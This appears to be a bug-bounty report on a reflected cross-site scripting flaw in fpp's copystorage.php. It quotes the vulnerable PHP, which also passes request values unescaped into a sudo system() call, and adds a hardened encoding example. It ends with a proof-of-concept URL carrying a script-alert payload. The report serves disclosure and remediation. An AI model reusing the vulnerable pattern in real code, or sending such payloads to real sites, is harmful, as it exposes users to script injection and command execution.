Cross-site Scripting (XSS) - Reflected in falconchristmas/fpp

Valid

Reported on May 12th 2021


✍️ Description

In https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/copystorage.php#L29 you echo a command built from untrusted user input back into the page without sanitizing or encoding it:

<?php
    $date = date("Ymd-Hi");
    $path = preg_replace('/{DATE}/', $date, $_GET['path']);

    echo "==================================================================================\n";

    $command = "sudo /opt/fpp/scripts/copy_settings_to_storage.sh " . $_GET['storageLocation'] . " " . $path . " " . $_GET['direction'] . " " . $_GET['delete'] . " " . $_GET['flags'] . " 2>&1";

    echo "Command: $command\n"; // I can embed custom and malicious JS here
    echo "----------------------------------------------------------------------------------\n";
    system($command);
    echo "\n";
?>
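The unencoded echo beside an output-encoded version, as an added example that is not code from the report or from the fpp project; the `direction` value and the `/backup/{DATE}` path are constructed stand-ins, and the payload is the one from the proof of concept:

```php
<?php
// Constructed stand-in for $_GET; storageLocation carries the report's PoC payload.
$get = [
    'storageLocation' => '<script>alert("zer0h");</script>',
    'path'            => '/backup/{DATE}',   // constructed value
    'direction'       => 'tostorage',        // assumed value, not from the page
    'delete'          => '',
    'flags'           => '',
];

// Same construction as copystorage.php: request values are concatenated verbatim.
function build_command(array $get): string {
    $date = date("Ymd-Hi");
    $path = preg_replace('/{DATE}/', $date, $get['path']);
    return "sudo /opt/fpp/scripts/copy_settings_to_storage.sh " . $get['storageLocation']
        . " " . $path . " " . $get['direction'] . " " . $get['delete'] . " " . $get['flags'] . " 2>&1";
}

// Vulnerable: the command string is reflected into the HTML response as-is,
// so any markup inside a request parameter is parsed by the browser.
function render_vulnerable(string $command): string {
    return "Command: $command\n";
}

// Hardened: HTML-encode before reflecting. ENT_QUOTES also encodes ' and ",
// and the explicit charset avoids mis-encoding on servers not defaulting to UTF-8.
// Note this only fixes the reflection; the values still reach system(), so they
// should additionally be validated against an allow-list or passed through
// escapeshellarg() before being used in the command.
function render_hardened(string $command): string {
    return "Command: " . htmlspecialchars($command, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "\n";
}

$command = build_command($get);
$raw  = render_vulnerable($command);
$safe = render_hardened($command);

// The script tag survives verbatim in the vulnerable output...
var_dump(strpos($raw, '<script>') !== false);   // bool(true)
// ...but is rendered as inert text in the hardened output.
var_dump(strpos($safe, '<script>') === false);  // bool(true)
var_dump(strpos($safe, '&lt;script&gt;alert(&quot;zer0h&quot;);&lt;/script&gt;') !== false); // bool(true)

echo $raw;
echo $safe;
```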

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/copystorage.php?storageLocation=%3Cscript%3Ealert(%22zer0h%22);%3C/script%3E

💥 Impact

Reflected cross-site scripting (XSS)
